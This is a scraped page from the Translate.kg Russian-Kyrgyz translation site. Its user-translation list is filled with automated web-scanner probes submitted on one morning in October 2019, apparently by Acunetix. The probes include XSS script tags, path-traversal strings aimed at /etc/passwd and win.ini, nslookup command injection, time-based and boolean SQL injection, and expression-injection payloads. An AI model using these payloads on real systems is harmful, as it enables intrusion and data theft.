Translate.kg котормочу

Түп-нуска тили: Орусча
Которулуучу тили: Кыргызча
Котормонун автору:
Кошулган күнү:

Которулуучу текст

../../../../../../../../../../../../../../../proc/version

Которуу

../../../../../../../../../../../../../../../proc/version

Колдонуучулардын котормолору

19716254
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
'"()&%<acx><ScRiPt >Iggm(9894)</ScRiPt>
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
1'"()&%<acx><ScRiPt >Iggm(9384)</ScRiPt>
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
<!--
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
'"
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
/www.vulnweb.com
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
ð''ð""
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
¿'¿"
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
JyI=
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
@@LJILT
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
\
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
1'"
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 6 д.п.
index.php/.
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
index.php
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
testasp.vulnweb.com/t/xss.html?%00
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
HttP://testasp.vulnweb.com/t/xss.html?%00
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
${@print(md5(acunetix_wvs_security_test))}\
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
${@print(md5(acunetix_wvs_security_test))}
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
"
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
'
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
'"()
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
^(#$!@#$)(()))******
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
!(()&&!|*|*|
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
)
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
1&n935026=v936735
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
testasp.vulnweb.com
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
Http://testasp.vulnweb.com/t/fit.txt
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:59 д.п.
${9999405+10000483}
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
12345'"\'\")
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
WEB-INF\web.xml
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
WEB-INF/web.xml
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
..\..\..\..\..\..\..\..\windows\win.ini
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
................windowswin.ini
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯windowsÀ¯win.ini
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
C:\WINDOWS\system32\drivers\etc\hosts
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
../../../../../../../../../../windows/win.ini
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
/WEB-INF/web.xml
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
/\../\../\../\../\../\../\../etc/passwd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
file:///etc/passwd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯etc/passwd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
/.././.././.././.././.././.././.././../etc/./passwd%00
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
%2fetc%2fpasswd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
/etc/passwd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
../../../../../../../../../../../../../../../proc/version
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
../../../../../../../../../../etc/passwd
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:58 д.п.
4Lqkt4PW
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
&nslookup 8g8SmlDr&'\"`0&nslookup 8g8SmlDr&`'
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
$(nslookup 3NSPFXZF)
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
set|set&set
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
uJReKTGS'))
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
JSpPxKbA')
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
HDuuFhCE'
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1))
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1)
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
7JjxoEgQ'
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
1 waitfor delay '0:0:6' --
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1)
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
if(now()=sysdate(),sleep(3),0)
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1" OR 2+500-500-1=0+0+0+1 --
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1' OR 2+987-987-1=0+0+0+1 or 'VnAzAsOR'='
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1' OR 2+581-581-1=0+0+0+1 --
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1 OR 2+114-114-1=0+0+0+1
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
-1 OR 2+118-118-1=0+0+0+1 --
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
1
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
1
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:57 д.п.
1
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:56 д.п.
1
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:56 д.п.
"+response.write(9934730*9953838)+"
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:56 д.п.
'+response.write(9934730*9953838)+'
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:56 д.п.
response.write(9934730*9953838)
Автор:
Белгисиз колдонуучу
Дата:
Окт. 6, 2019, 5:56 д.п.
1
Автор:
Белгисиз колдонуучу
Дата:
Окт. 4, 2019, 11:45 п.п.